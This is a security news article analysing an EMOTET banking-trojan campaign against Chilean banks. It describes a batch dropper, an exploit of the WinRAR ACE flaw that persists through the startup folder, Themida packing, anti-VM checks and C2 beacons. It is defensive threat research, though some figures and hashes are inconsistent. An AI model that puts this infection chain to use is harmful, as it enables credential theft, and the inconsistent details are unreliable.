Pierluigi Paganini
April 10, 2019
The last days of March 2019 are making headlines due to a targeted cyber attack involving a new variant of infamous EMOTET malware. This threat is known as a banking trojan malware that collects financial information by injecting malicious code into a computer.
EMOTET has evolved in its delivery, however, this wave was conducted with the most prominent form: inserting malicious documents or URL links inside the body of an email sometimes disguised as an invoice or PDF attachment.
According to SI-LAB, a total of 176 users from Chile were affected in a broad cyber threat occurred between March 18th and 26th of 2019. Once again, the main goal of this campaign involving EMOTET had the propose of exfiltrating financial credentials from user’s computers to access financial and banking services geolocated in Chile.
The first phase identified as “__Denuncia_Activa_CL.PDF.bat” is responsible for operating a crucial part of this threat. That file was delivered via malscam campaigns around the world and its source-code is obfuscated in order to evade antivirus detection and complicate its analysis.
Interestingly, the first phase bypasses Virus Total (VT) detentions. With that, criminals achieved an important rule of thumb in the malware landscape: no detection. In fact, an old living of the land technique was used allowing to get fully undetectable (FUD) which is the ultimate goal for malware authors.
The .bat file is a Windows batch script that is responsible for downloading a second script from the Command & Control (C&C) server. The latter leverages the WinRar/Ace vulnerability (CVE-2018-20250) dropping the malware itself into the Windows startup folder. Next, the infected machine will reboot and malware becomes persistent in the system startup.
The high-level workflow this campaign is illustrated below.
EMOTET was protected with an extreme commercial packer dubbed Themida. Themida introduced an additional protection layer that made it harder to analyze. Other restrictions were also coded to prevent its execution in different types of scenarios. In this case, for instance, malware authors introduced several anti-run specifications related to victims’ geolocation and language preferences — only Spain/Chile computers were compromised.
Themida packer has a large group of specific features that are very appreciated by criminals to protect their threats. For example, it uses VM-protection techniques, debug-protection, virtual machine emulation, anti-monitors techniques, anti-memory patching (see all Themida features here).
The first alert related to this wave was observed on March 22nd by The Computer Security Certified Response Team (CSIRT), of the Ministry of the Interior from Chile.
“Preliminary information collected allows us to determine that the following URLs and the following IP addresses must be blocked, unless otherwise indicated,” the CSIRT Ministry of the Interior states.
“Based on information obtained from internal sources, the cybersecurity alert situation was identified by an incident related to malicious software called EMOTET affected by the relevant sectors of the economy” – CSIRT Chile.
CSIRT released a comprehensive list of IP addresses that EMOTET signals had to block. A national alert was sent (below) and can be consulted in this URL.
SI-LAB detected that this attack started some days before the alerts were published. Thesecond malware phase (denuncias.rar); which used WinRar/Ace vulnerability (CVE-2018-20250) to drop the malware itself was uploaded by criminals to the opendir C2 server on March 18th, 2019. We can note below, in Technical Analysis, that the malware was uploaded again later into another web folder on March 21st — maybe an update/change performed by its operators to improve their functionalities or to fix some bug.
As aforementioned, EMOTET only executes inside victim’s computers with Spain/Chile configured as their primary language and this can be an indicator that points to a global target attack.
After several rounds to understand the malware, we found that some Chile financial and banking organizations were targeted, including:
When the malware is executed without any restrictions, i.e., upon a non-virtualized environment, some information from the victim’s computer is send to C2 server. Data includes date/hour of infection, remote IP from victim’s computer, OS version andantivirus name.
This information was available online on the opendir C2 server and SI-LAB analysed data in order to understand the total of infections and victims impacted this malicious targeted attack.
In detail, we found that 1089 users were impacted by this malware between March 18th and 26th, 2019.
We built a GeoMap of Threats that aggregates the victims’ IP addresses, based on their geolocation, that were collected from all the data in the opendir C2 server. Color intensity is correlated with the number of infections, being the darkest red equivalent to 175 infections in Chile.
As indicated on the GeoMap of Threats, Chile, USA, Germany and France were the countries with most hits observed by SI-LAB. From a total of 1089 infections, 175 victims were impacted in Chile, 162 in USA, 137 in Germany and 132 in France.
Governmental agency CSIRT and Cybersecurity National System from Chile are currently fighting this growing threat and have been working on increasing awareness among users in the country. They encourage users to stay tuned for their computer security alerts.
For more details and complete analysis of this malicious campaign see the Technical Analysis below.
Threat name: __Denuncia_Activa_CL.PDF.bat
MD5: 1e541b14b531bcac70e77a012b0f0f7f
SHA1: 0ca0cd36fb4c9dfeb3e325a01cfb7b75413d1f81
First submission: 2019-03-22 00:39:43
The last weeks of March 2019 were underlined for the bad reasons — a global cyber threat targeted financial institutions and banks from Chile via EMOTET banking trojan malware.
This campaign was conducted via an initial malscan wave adding malicious documents or URL links inside the body of an email sometimes disguised as an invoice or PDF attachment.
According to SI-LAB, 1089 users where impacted by this wave; 176 only in Chile. This malware is not new and, once gain, the main goal was exfiltration of credentials from user’s to access financial and banking services geolocated in Chile.
The first malware phase identified as “__Denuncia_Activa_CL.PDF.bat” is seen as the maestro of all operations strictly well-planed by criminals. This file was delivered via malscam campaigns around the world and its code is obfuscated in order to evade antivirus detection and make harder its analysis. Figure 1 (below) shows the batch script encoded in Little-endian UTF-16.
Figure 1: EMOTET malware obfuscated (encoded in Little-endian UTF-16) — the first phase.
After some rounds was possible to get the malware source-code in ASCII. Let’s look below.
Figure 2: EMOTET malware deobfuscated — the first phase.
In general, the malicious batch script performs the following actions:
1. Generates random name to rename the 2nd stage (dropper)
First, the malware generates a random name to rename the 2nd file downloaded from C2 server (the stage that executes the WinRar/Ace vulnerability — CVE-2018-20250). The latter will drop the EMOTET itself onto the Windows startup folder (discussed later).
In detail, on lines 33, 34 and 35 we can observe that the second stage is download to the victim’s download folder. Next image presents the output generated from the batch file.
Figure 3: Malware source-code output – the first phase.
2. Drops 2nd stage: PowerShell command is executed to drop the WinRar exploit ‘denuncias.rar’ file.
The 2nd stage is downloaded from C2 server and is renamed (“25RqcZpQ3.rar”) and placed into “C:\Users\root\Downloads” folder.
Figure 4: Download path – the first phase.
As shown, this file is downloaded from an opendir C2 server. Note that C2 server has available this file in two different directories, namely:
Figure 5: 2nd stage available to download in two different directories.
3. Extracts EMOTET via WinRar: After the 2nd stage download (‘denuncias.rar’), the file is executed and the malware itself (‘Integrity.exe’ – EMOTET) is dropped by WinRar/ACE vulnerability onto Windows startup folder; see lines 38 – 42 in Figure 2.
4. Pings for delay simulation
5. Reboot for malware persistence
Once the command shutdown -r is executed the Windows will reboot. This step will create the malware persistence as the EMOTET extracted from 2nd stage places it in Windows startup folder. While a normal reboot by the user would also have the same effect, for some reason this campaign doesn’t want to wait until the user initiates the reboot.
Upon reboot, the malicious program “Integrity.exe” (EMOTET malware) gets into action and connects to the Command and Control (C&C) server.
Figure 6: Infection graph generated and extracted from Virus Total.
Interestingly, the first phase bypasses Virus Total (VT) detentions. With that, criminals achieved an important rule of thumb in the malware landscape: no detection. In fact, an old living of the land technique was used allowing to get fully undetectable (FUD) which is the ultimate goal for malware authors.
Figure 7: No detection were identified by VT.
Threat name: 25RqcZpQ3.rar / denuncias.rar
MD5: 1e541b14b531bcac70e77a012b0f0f7f
SHA1: 0ca0cd36fb4c9dfeb3e325a01cfb7b75413d1f81
First submission: 2019-03-22 00:39:43
Looking inside the dropper, we can observe interesting artifacts.
Figure 8: Hex code from ‘denuncias.rar’ file — EMOTET dropper.
As shown, the string “C:../AppData\Roaming\Microsoft\Windows\Start.Menu\Programs\Startup\Integrity.exe” is found. In fact, this is the CVE-2018-20250 just saying “hello world, I’m here!”
In detail, if UAC is running, when you attempt to extract the archive it will fail to place the malware in the “C:\ProgramData” folder due to lack of permissions. This will cause WinRAR to display an error stating “Access is denied” and “operation failed”.
On the other hand, if UAC is disable or WinRAR is run with administrator privileges it will install the malware to the next path:
Extracting all the files we can take and analyse the malware itself.
Figure 9: EMOTET malware (‘Integrity.exe”) dropped by 2nd stage.
More details on CVE-2018-20250 here.
Threat name: Integrity.exe
MD5: 98172becba685afdd109ac909e3a1085
SHA1: cbb0377ec81d8b120382950953d9069424fb100e
First submission: 2019-03-18 15:10:08
Deeping into the last malware infection stage, we are facing the EMOTET trojan banker — a credential stealer malware that is infecting user’s from Chile in the last months.
At the first glance, the malware is protected with the packer Themida 2.x. This is a terrible notice for malware analysts.
Unpacking Themida, especially the newer versions, is not a small task by any means. Themida uses an extremely complex virtual machine environment combined with every anti-debug and anti-analysis trick in the books, combined with many different obfuscation methods.
In a Themida binary, different parts of the code are run in virtual machines and it obscures the behavior of the target program. The best method to unpack a VM-protected packer like Themida is to devirtualize it, which involves figuring out the entire instruction set that the packer uses and writing a script to interpret that language.
Figure 10 shows the binary was developed in Delphi; nonetheless, we will not decompile it because Themida is very hard to unpack and that task is extremely complex.
Figure 10: Packer and compiler detected — Themida 2.x and Delphi.
As we can see below (Figure 11 and 12), and to reinforce the packer presence, some sections are null name values, and other ones have high entropy (around 8.0). This is a clear signal that we are facing a challenge: Themida packer!
Figure 10: EMOTET section entropy.
Figure 11 below illustrates in middle that great part this file is really packed.
Figure 11: Emotet file entropy.
On the one hand, another perfect indicator that Themida is here is the PE file import table (IAT). The IAT is partial destroyed and just a function from kernel32.dll DLL can be observed: lstrcpy.
Figure 12: EMOTET IAT (result from Themida packer).
Themida packer is, in fact, a constant challenge for malware analysts. The approach that we used to get some inspection from malware file was dump it from memory when it is running. Notwithstanding, remember that just little pieces of code are devirtualized by Themida during its execution. And kept in mind that Themida will detect anti-monitors techniques against file and registry monitors as well.
First, virtual machine need to be tuned as well as the perfect conditions to simulate the infection scenario as real as possible. For this, we need to change the system language preferences to Spain/Chile and adjust some registries in Windows Registry — malware get its values to evade possible detection.
Figure 13: Changes performed in HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\DESCRIPTION\System | SystemBiosDate and VideoBiosVersion registries.
But nothing is perfect. The malware verifies all time the processes are running in the system and terminates if any of them are found (this is a evade technique used by Themida packer and available here). This is one of the many features this modern packer.
Well, backing to EMOTET, and after dumping it from memory, we observed some things such as some DLLs imported and the malware strings.
Just few blocks of EMOTET can be analysed as Themida runs based on a virtual machine environment. Thus, malware functions are devirtualized in real time, and we cannot fix the IAT properly as well.
Figure 14: DLLs imported by EMOTET and anti-VM and anti-dbg techniques detected in this specific memory dump.
After dump it from memory, we need observe that only some DLLs are rebuild. We suspect that other ones continuing hidden. Both Anti-VM and and anti-dbg tecnhiques were again detected after dump the malware. This is not newly!
However, some info can be extracted from the binary. When it is executed in victim’s computers, initial info is send to C2 server (a specie of “EHLO” message with some arguments).
Figure 15: EMOTET C2 server URL.
Information sent includes:
Figure 16 presents a query performed by malware in order to identify the antivirus name running in the infected machine. Winmgmts is a WMI service within the SVCHOST process running under the “LocalSystem” account.
Figure 16: EMOTET collects antivirus product name via WMI query.
The file “up.php” writes all the entries to another file called “tictic.txt“. Every time that a victim is infected, a EHLO request is send to “up.php” that writes the infection data highlighted above inside this file.
Figure 17: EMOTET C2 files available in a opendir.
Through this file available in an opendir C2 was possible to build an GeoMap of Threats presented at the beginning of the article.
After processing the data we detected that 1089 user’s were infected during this campaign. As pointed out, Chile, USA, Germany and France were the countries with more hits. From a total of 1089, 175 victims were impacted in Chile, 162 in USA, 137 in Germany and 132 in France.
But is important answer this question: What kind of data is collected by this trojan banker? —Banking credentials, of course.
EMOTET drops a sqlite3.dll DLL during its execution in order to use it to get data from sqlite databases from the installed popular web-browsers.
Figure 18: EMOTET collects data from main popular web-browsers.
During static analysis was also possible observe the targeted banks and financial institutions involved in this attack, namely:
Figure 19: Banks and financial institutions involved in this attack.
Figure 20 (below) shows one of the last administration panels used by EMOTET in its recent infections.
Figure 20: Administration panel used in recent variants by EMOTET.
Another interesting aspect is the following string observed in past EMOTET infections and hardcoded inside many malware samples.
This is a drag’n’drop interface support file for Delphi 5,6,7,2005,2006 & C++Builder. We could not retrieve any more information about this library in malware.
During this analysis we detect that malware performs several connections to “www.bing.com” — maybe to validate a successful connection to the Internet.
Figure 21: Internet connection is validated during EMOTET execution.
Curious that after several memory dumps we detect some interesting strings are changing in memory. In a specific moment we get the following:
This seems a encrypted strings with specific information about banking systems (maybe, endpoints — we don’t know).
One way to understand the malware totally is devirtualize all entire code. As shown, Themida packer make harder the malware analysis and that was a big challenge during this investigation.
Further details, including Indicators of Compromise (IoCs), are reported in the analysis published by Pedro Tavares.
About the author Pedro Tavares
Pedro Tavares is a professional in the field of information security working as an Ethical Hacker, Malware Analyst and also a Security Evangelist. He is also a founding member and
| [adrotate banner=”9″] | [adrotate banner=”12″] |
(
[adrotate banner=”5″]
[adrotate banner=”13″]
